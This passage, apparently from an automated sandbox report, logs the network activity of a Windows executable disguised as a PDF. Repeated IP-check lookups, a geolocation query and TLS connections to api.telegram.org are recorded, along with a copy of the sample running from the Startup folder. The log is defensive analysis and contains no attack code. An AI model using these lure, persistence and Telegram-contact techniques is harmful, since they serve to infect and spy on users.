                                                                                                                                                                              Jan 13, 2025 12:08:30.774403095 CET49771443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:30.774609089 CET49771443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:30.774632931 CET44349771104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:30.815725088 CET4977080192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:31.234797955 CET44349771104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:31.241230965 CET49771443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:31.241324902 CET44349771104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:31.381217003 CET44349771104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:31.381382942 CET44349771104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:31.381455898 CET49771443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:31.382033110 CET49771443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:31.662866116 CET4977080192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:31.664016008 CET4977280192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:31.667944908 CET8049770132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:31.667995930 CET4977080192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:31.668855906 CET8049772132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:31.668921947 CET4977280192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:31.669025898 CET4977280192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:31.673852921 CET8049772132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:31.772635937 CET4973680192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:31.950078964 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:31.950167894 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:31.950256109 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:31.950529099 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:31.950562954 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:32.504878998 CET8049772132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:32.506238937 CET49774443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:32.506273985 CET44349774104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:32.506336927 CET49774443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:32.506614923 CET49774443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:32.506628990 CET44349774104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:32.550108910 CET4977280192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:32.621587992 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:32.633318901 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:32.633356094 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:32.633423090 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:32.633445024 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:32.872342110 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:32.872534990 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:32.872615099 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:32.872807026 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:32.970576048 CET44349774104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:32.972028971 CET49774443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:32.972054958 CET44349774104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:33.114842892 CET44349774104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:33.115058899 CET44349774104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:33.115241051 CET49774443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:33.115413904 CET49774443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:33.118060112 CET4977280192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:33.119123936 CET4977580192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:33.123130083 CET8049772132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:33.123214006 CET4977280192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:33.124097109 CET8049775132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:33.124183893 CET4977580192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:33.124239922 CET4977580192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:33.129050970 CET8049775132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:33.987791061 CET8049775132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:33.994393110 CET49776443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:33.994524002 CET44349776104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:33.994597912 CET49776443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:33.994827986 CET49776443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:33.994854927 CET44349776104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:34.034460068 CET4977580192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:34.482867956 CET44349776104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:34.484915972 CET49776443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:34.484977007 CET44349776104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:34.618917942 CET44349776104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:34.619057894 CET44349776104.21.32.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:34.619138956 CET49776443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:34.619457006 CET49776443192.168.2.4104.21.32.1
                                                                                                                                                                              Jan 13, 2025 12:08:34.632385015 CET4977580192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:34.632812023 CET49777443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:34.632903099 CET44349777149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:34.633043051 CET49777443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:34.633506060 CET49777443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:34.633541107 CET44349777149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:34.637557030 CET8049775132.226.8.169192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:34.637635946 CET4977580192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:35.277810097 CET44349777149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:35.277923107 CET49777443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:35.279777050 CET49777443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:35.279798985 CET44349777149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:35.280131102 CET44349777149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:35.281398058 CET49777443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:35.323337078 CET44349777149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:35.524301052 CET44349777149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:35.524446011 CET44349777149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:35.524548054 CET49777443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:35.527189970 CET49777443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:42.662573099 CET4975980192.168.2.4132.226.8.169
                                                                                                                                                                              Jan 13, 2025 12:08:42.807441950 CET49778443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:42.807526112 CET44349778149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:42.807756901 CET49778443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:42.807993889 CET49778443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:42.808011055 CET44349778149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:43.412666082 CET44349778149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:43.414372921 CET49778443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:43.414405107 CET44349778149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:43.414499044 CET49778443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:43.414515018 CET44349778149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:43.858088017 CET44349778149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:43.858161926 CET44349778149.154.167.220192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:43.858222008 CET49778443192.168.2.4149.154.167.220
                                                                                                                                                                              Jan 13, 2025 12:08:43.858583927 CET49778443192.168.2.4149.154.167.220
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Jan 13, 2025 12:08:07.079408884 CET5135353192.168.2.41.1.1.1
                                                                                                                                                                              Jan 13, 2025 12:08:07.086311102 CET53513531.1.1.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:09.895819902 CET5836253192.168.2.41.1.1.1
                                                                                                                                                                              Jan 13, 2025 12:08:09.903475046 CET53583621.1.1.1192.168.2.4
                                                                                                                                                                              Jan 13, 2025 12:08:22.900878906 CET5214653192.168.2.41.1.1.1
                                                                                                                                                                              Jan 13, 2025 12:08:22.908869028 CET53521461.1.1.1192.168.2.4
                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Jan 13, 2025 12:08:07.079408884 CET192.168.2.41.1.1.10x7fe5Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:09.895819902 CET192.168.2.41.1.1.10x31f6Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:22.900878906 CET192.168.2.41.1.1.10x8ab4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Jan 13, 2025 12:08:07.086311102 CET1.1.1.1192.168.2.40x7fe5No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:07.086311102 CET1.1.1.1192.168.2.40x7fe5No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:07.086311102 CET1.1.1.1192.168.2.40x7fe5No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:07.086311102 CET1.1.1.1192.168.2.40x7fe5No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:07.086311102 CET1.1.1.1192.168.2.40x7fe5No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:07.086311102 CET1.1.1.1192.168.2.40x7fe5No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:09.903475046 CET1.1.1.1192.168.2.40x31f6No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:09.903475046 CET1.1.1.1192.168.2.40x31f6No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:09.903475046 CET1.1.1.1192.168.2.40x31f6No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:09.903475046 CET1.1.1.1192.168.2.40x31f6No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:09.903475046 CET1.1.1.1192.168.2.40x31f6No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:09.903475046 CET1.1.1.1192.168.2.40x31f6No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:09.903475046 CET1.1.1.1192.168.2.40x31f6No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Jan 13, 2025 12:08:22.908869028 CET1.1.1.1192.168.2.40x8ab4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                              • reallyfreegeoip.org
                                                                                                                                                                              • api.telegram.org
                                                                                                                                                                              • checkip.dyndns.org
                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.449730132.226.8.169807088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:07.104523897 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 13, 2025 12:08:08.976592064 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:08 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                              Jan 13, 2025 12:08:09.023787022 CET127OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Jan 13, 2025 12:08:09.859023094 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:09 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                              Jan 13, 2025 12:08:10.580598116 CET127OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Jan 13, 2025 12:08:10.897963047 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:10 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.449736132.226.8.169807088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:11.508167028 CET127OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Jan 13, 2025 12:08:12.349210024 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:12 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.449740132.226.8.169807088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:12.967997074 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 13, 2025 12:08:14.801299095 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:14 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.449742132.226.8.169807088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:15.439703941 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 13, 2025 12:08:16.284544945 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:16 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.449744132.226.8.169807088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:17.065684080 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 13, 2025 12:08:17.875715017 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:17 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.449746132.226.8.169807088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:18.539208889 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 13, 2025 12:08:19.367412090 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:19 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              6192.168.2.449748132.226.8.169807556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:20.016923904 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 13, 2025 12:08:20.832367897 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:20 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                              Jan 13, 2025 12:08:20.835899115 CET127OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Jan 13, 2025 12:08:21.128580093 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:21 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                              Jan 13, 2025 12:08:21.846529007 CET127OUTGET / HTTP/1.1
